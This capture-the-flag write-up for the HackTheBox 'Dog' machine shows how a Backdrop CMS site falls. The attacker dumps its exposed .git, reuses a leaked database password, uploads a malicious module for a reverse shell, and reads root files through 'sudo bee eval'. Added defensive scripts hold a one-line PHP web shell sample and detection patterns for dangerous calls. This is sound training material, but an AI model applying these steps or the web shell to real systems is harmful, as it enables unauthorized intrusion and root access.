HackTheBox - Dog
Dog is running Backdrop CMS. We found a publicly accessible .git repository, recovered credentials from the site files, used those credentials to log in as an admin and upload a malicious Backdrop module to achieve authenticated RCE. From a webshell (www-data) we pivoted to a user account (johncusack) via password reuse and then abused a sudo-exposed binary to read root.txt.
Port Scanning
We start off with an nmap scan on the target.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| ssh-rsa
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
| 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-title: Home | Dog
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From the scan we get port 22 running SSH (OpenSSH 8.2p1 on Ubuntu) and port 80 running an Apache 2.4.41 web server. The http-generator header already tells us the site is Backdrop CMS, and nmap's http-git script found an exposed .git directory.
Web Enumeration
From the nmap scan we know the website has a `robots.txt` file:
curl http://10.10.11.58/robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html
#
# For syntax checking, see:
# http://www.robotstxt.org/checker.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /core/
Disallow: /profiles/
# Files
Disallow: /README.md
Disallow: /web.config
# Paths (clean URLs)
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
# Paths (no clean URLs)
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: /?q=node/add
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logout
The scan also identified the CMS being used. We can use this to search for an exploit later on.
http-generator: Backdrop CMS 1 (https://backdropcms.org)
The scan also identified a git repository at 10.10.11.58:80/.git/:
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
To view the website's source code, we use git-dumper to download the exposed repository:
git-dumper http://10.10.11.58/.git Dog.htb_Website
The directory structure:
drwxrwxr-x 7 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 .git
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 18092 Mar 9 18:28 LICENSE.txt
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 5285 Mar 9 18:28 README.md
drwxrwxr-x 9 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 core
drwxrwxr-x 7 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 files
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 578 Mar 9 18:28 index.php
drwxrwxr-x 2 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 layouts
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 1198 Mar 9 18:28 robots.txt
-rwxrwxr-x 1 sh3rl0ck sh3rl0ck 21732 Mar 9 18:28 settings.php
drwxrwxr-x 2 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 sites
drwxrwxr-x 2 sh3rl0ck sh3rl0ck 4096 Mar 9 18:28 themes
Before viewing the source code, let's visit the site.
Now that we know the username format, let's see whether the source code contains any usernames:
grep -Ri dog.htb .
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
With the username tiffany@dog.htb, let's find the password.
Since the site's database credentials must be stored somewhere in the config files, I searched for the database type, found that they use MySQL, and then used grep to narrow the search:
grep -Ri mysql .
./README.md:- MySQL 5.0.15 or higher with PDO enabled
./README.md:1. Create a new database, username, and password for Backdrop to use in MySQL.
grep: ./.git/index: binary file matches
./settings.php:$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
Just to confirm, let's view the relevant lines of ./settings.php:
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';
Since this is the only password we found, we will try password reuse :)
So far we have these valid credentials: username tiffany@dog.htb, password BackDropJ2024DS2024.
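The two exposures that handed us the site (a .git directory served from the web root, and a plaintext database DSN in settings.php) are easy to audit for on the defending side. The following script is an added example, not part of this writeup or of Backdrop: it walks a web root (or a dumped copy of one), reports any VCS directory it finds, and parses connection URLs out of config files, redacting the password in the report. The directory layout it builds for the demo and the sample settings.php content are constructed; the DSN in that sample is the one grep found above.

```python
"""Audit a recovered or deployed web root for two exposure classes:
a VCS directory (.git) published under the document root, and database
credentials embedded in site config such as settings.php.  Added example,
not part of the writeup; directory layout and sample content are constructed."""
import os
import re
import tempfile
from urllib.parse import urlsplit

VCS_DIRS = {".git", ".svn", ".hg"}                    # should never be web-served
CONFIG_SUFFIXES = (".php", ".inc", ".json", ".yml", ".yaml", ".env", ".ini")

# Backdrop/Drupal style DSN: $database = 'mysql://user:pass@host/db';
DB_URL_RE = re.compile(r"""['"]([a-z][a-z0-9+.-]*://[^'"\s]+)['"]""", re.I)

# The DSN the writeup found in settings.php, used here as constructed sample text.
SAMPLE_SETTINGS = (
    "<?php\n"
    "$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';\n"
    "$database_prefix = '';\n"
)


def find_db_credentials(text):
    """One finding per connection URL in *text* that embeds a password."""
    findings = []
    for m in DB_URL_RE.finditer(text):
        url = m.group(1)
        parts = urlsplit(url)
        if not parts.password:
            continue                                   # user-only DSN, nothing secret
        findings.append({
            "user": parts.username,
            "host": parts.hostname,
            "db": parts.path.lstrip("/"),
            "redacted": url.replace(":" + parts.password + "@", ":***@"),
        })
    return findings


def scan_webroot(root):
    """Walk *root* and report VCS directories and credential-bearing configs."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in [d for d in dirnames if d in VCS_DIRS]:
            findings.append({"type": "vcs_dir", "path": os.path.join(dirpath, d)})
            dirnames.remove(d)                         # no need to descend into it
        for fn in filenames:
            if not fn.endswith(CONFIG_SUFFIXES):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for cred in find_db_credentials(text):
                findings.append({"type": "db_credential", "path": path, **cred})
    return findings


def build_demo_webroot():
    """Create a throwaway tree shaped like the dumped site: .git/ plus settings.php."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, ".git", "refs"))
    os.makedirs(os.path.join(root, "core"))
    with open(os.path.join(root, "settings.php"), "w") as fh:
        fh.write(SAMPLE_SETTINGS)
    return root


def run_demo():
    """Scan the constructed tree; returns the findings list."""
    return scan_webroot(build_demo_webroot())


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_webroot()
    for finding in scan_webroot(target):
        print(finding)
```

Run it against a real document root (`python3 audit_webroot.py /var/www/html`) from a deploy pipeline or cron job; a `vcs_dir` finding means the repository metadata is one `git-dumper` away from anyone who can reach port 80, and a `db_credential` finding is a password that a source leak turns into a database (and, as here, an application) login.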
Web Exploitation
We get access to the admin dashboard, very nice :)
The dashboard's Backdrop CMS branding confirms the content management system we identified in the scan; let's search for an exploit.
The Python exploit script targets a vulnerability in Backdrop CMS 1.27.1 that lets an authenticated user with admin (or similarly privileged) access upload a malicious module and gain remote command execution (RCE). This works for us because we are logged in as admin.
Here is how the exploit works:
- Creates a malicious module: the script generates a fake Backdrop CMS module (shell) consisting of shell.info, the metadata Backdrop needs to recognise it as a valid module, and shell.php, a simple web shell that executes system commands.
- Compresses the malicious module into a ZIP file: the script packages shell.info and shell.php into shell.zip, ready for upload.
We will do this manually instead of just running the script.
- Create the shell.info file:
type = module
name = Block
description = remote code execution vulnability exploit.
package = Layouts
tags[] = Blocks
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x
configure = admin/structure/block
project = backdrop
version = 1.27.1
timestamp = 1709862662
- Create a shell.php file; for this we will use the pentestmonkey PHP reverse shell script.
- Compress the malicious module; for this we use the command: tar -czvf shell.tar.gz shell/
- Now upload the module by visiting http://10.10.11.58/?q=admin/installer/manual
- Run nc listening on our machine and wait for a shell, hopefully.
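The manual installer accepts whatever archive an administrator hands it, so the practical control on the defending side is to inspect module archives before they are installed (or to audit the modules directory afterwards). The scanner below is an added example, not Backdrop's own code: it opens a tar.gz, parses each .info file with the key = value and tags[] conventions shown above, and flags PHP files that pass request input to the OS or to eval(). The sample archives are constructed in memory; the malicious one reuses the shell.info layout from the steps above (note its duplicated version key) next to a one-line stand-in for the web shell the script description mentions, and the hypothetical hello module shows the clean case.

```python
"""Pre-install scanner for a Backdrop-style module archive (tar.gz).
Added example, not Backdrop's own code: it parses .info files and flags PHP
that passes request input to the OS or to eval().  The sample modules are
constructed here; 'hello' is hypothetical."""
import io
import re
import tarfile

# PHP calls that hand a string to the OS or back to the PHP interpreter.
DANGEROUS_PHP = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
# Superglobals that make such a call reachable from an HTTP request.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
PHP_SUFFIXES = (".php", ".inc", ".module", ".install", ".theme")


def parse_info(text):
    """Parse the key = value .info format; returns (info dict, duplicate keys)."""
    info, dups = {}, set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "#")) or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        if key.endswith("[]"):                 # tags[] = Blocks  -> list
            info.setdefault(key[:-2], []).append(value)
            continue
        if key in info:
            dups.add(key)                      # last value wins, as in the CMS parser
        info[key] = value
    return info, dups


def scan_module_archive(blob):
    """Return [(member, reason)] findings for a gzip'd tar archive given as bytes."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        for member in tar.getmembers():
            name = member.name
            if name.startswith("/") or ".." in name.split("/"):
                findings.append((name, "path traversal in member name"))
                continue
            if not member.isfile():
                continue
            data = tar.extractfile(member).read().decode("utf-8", "replace")
            if name.endswith(".info"):
                info, dups = parse_info(data)
                if info.get("type") != "module":
                    findings.append((name, "not declared as type = module"))
                for key in sorted(dups):
                    findings.append((name, f"duplicate key '{key}' (last value wins)"))
            elif name.endswith(PHP_SUFFIXES):
                calls = sorted({m.group(1).lower() for m in DANGEROUS_PHP.finditer(data)})
                if calls:
                    reason = "dangerous call(s): " + ", ".join(calls)
                    if REQUEST_INPUT.search(data):
                        reason += " fed by request input"
                    findings.append((name, reason))
    return findings


def build_archive(files):
    """Build an in-memory tar.gz from {member_name: text}; used for the samples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            ti = tarfile.TarInfo(name)
            ti.size = len(data)
            tar.addfile(ti, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples: the .info layout from the writeup plus a one-line
# stand-in for the web shell it describes, and a harmless hypothetical module.
SHELL_INFO = """type = module
name = Block
description = remote code execution vulnability exploit.
package = Layouts
tags[] = Blocks
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x
configure = admin/structure/block
project = backdrop
version = 1.27.1
timestamp = 1709862662
"""
MALICIOUS = build_archive({"shell/shell.info": SHELL_INFO,
                           "shell/shell.php": "<?php system($_REQUEST['cmd']);"})
CLEAN = build_archive({"hello/hello.info": "type = module\nname = Hello\nbackdrop = 1.x\n",
                       "hello/hello.module": "<?php\nfunction hello_menu() { return array(); }\n"})

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS), ("clean", CLEAN)):
        print(label, scan_module_archive(blob) or "no findings")
```

The regex check is deliberately coarse (a legitimate module may call exec() for a good reason), so treat a hit as a reason for a human to read the file, not as a verdict. The stronger controls sit around it: keep the manual installer restricted to the few accounts that need it, and since the whole chain started from a reused database password, do not let the DB credential in settings.php double as a user's login.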
We successfully get a shell, but only as www-data, so we switch to user johncusack with the same password, BackDropJ2024DS2024:
johncusack@dog:~$ ls -l user.txt
ls -l user.txt
-rw-r----- 1 root johncusack 33 Mar 9 17:11 user.txt
johncusack@dog:~$
Privilege Escalation
I ran privilege escalation enumeration; the relevant section of the output:
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-xr-x 1 root root 467K Feb 11 14:09 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 67K Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 44K Feb 6 2024 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 87K Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 84K Feb 6 2024 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 31K Feb 21 2022 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
-rwsr-xr-x 1 root root 39K Apr 9 2024 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 52K Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Apr 9 2024 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 67K Feb 6 2024 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 163K Apr 4 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
Interesting findings included the SUID binaries listed above and the sudo rules for johncusack.
The key was /usr/local/bin/bee, Backdrop's command-line tool, which johncusack can run via sudo; its eval command executes arbitrary PHP, here as root.
Example of exploitation:
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval "echo file_get_contents('/root/root.txt');"
b123db2203.......................
johncusack@dog:/var/www/html$
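The root step is a sudoers problem rather than a bee bug: any program whose job includes evaluating code (bee eval, drush, php, a shell, an editor) is a root shell once it is granted through sudo without fixed arguments. The script below is an added example, not taken from the writeup: it parses sudoers user-spec lines and reports such grants. The post does not print the box's sudo -l output, so the rules in the sample are constructed to resemble it; the deploy rule with a fixed bee status subcommand is hypothetical and shows the narrower grant an administrator could write instead.

```python
"""Audit sudoers rules for programs that execute arbitrary code for the
caller, which is what makes 'sudo bee eval' on this box a root shell.
Added example, not from the writeup; the rules below are constructed because
the post does not show the box's real sudo -l output."""
import os
import re

RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(
    r"^(?:(?:NO)?(?:PASSWD|EXEC|SETENV|MAIL|FOLLOW|INTERCEPT|LOG_INPUT|LOG_OUTPUT):\s*)+")
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")

# Programs whose ordinary function includes evaluating code or spawning a
# shell; granting them via sudo without fixed arguments is root access.
CODE_RUNNERS = {"bee", "drush", "php", "python", "python3", "perl", "ruby",
                "node", "bash", "sh", "dash", "zsh", "vi", "vim", "less", "more",
                "find", "awk", "env"}

# Constructed sample; 'deploy' and 'backup' are hypothetical rules.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# Constructed rule shaped like the one the writeup exploits
johncusack ALL=(ALL) NOPASSWD: /usr/local/bin/bee
# Narrower grant: one fixed, read-only subcommand instead of the whole tool
deploy  ALL=(root) /usr/local/bin/bee status
backup  ALL=(root) /usr/bin/rsync -a /srv/data/ /mnt/backup/
"""


def parse_sudoers(text):
    """Expand each user-spec line into one record per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()    # drop comments and #include lines
        if not line or line.startswith(SKIP):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = TAG_RE.sub("", cmd.strip())  # strip NOPASSWD: and similar tags
            rules.append({"who": m.group("who"),
                          "runas": m.group("runas") or "root",
                          "cmd": cmd})
    return rules


def audit_sudoers(text):
    """Return (who, cmd, severity, reason) for rules that amount to root code execution."""
    findings = []
    for r in parse_sudoers(text):
        if r["who"] == "root":
            continue                             # root gains nothing from sudo
        cmd = r["cmd"]
        if cmd == "ALL":
            findings.append((r["who"], cmd, "high", "unrestricted sudo"))
            continue
        argv = cmd.split()
        prog = os.path.basename(argv[0])
        if prog not in CODE_RUNNERS:
            continue
        if len(argv) == 1:
            findings.append((r["who"], cmd, "high", f"{prog} with arguments unrestricted"))
        elif any("*" in a for a in argv[1:]):
            findings.append((r["who"], cmd, "high", f"{prog} with wildcard arguments"))
        else:
            findings.append((r["who"], cmd, "review", f"{prog} limited to fixed arguments"))
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    for who, cmd, sev, why in audit_sudoers(text):
        print(f"[{sev}] {who}: {cmd}  ({why})")
```

Point it at /etc/sudoers and the files under /etc/sudoers.d. A "high" line for an interpreter-like program is the finding that matters here: even a rule that pins arguments only helps if the subcommand itself cannot reach eval or a shell, which is why the fix is to drop the grant rather than to tweak it.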
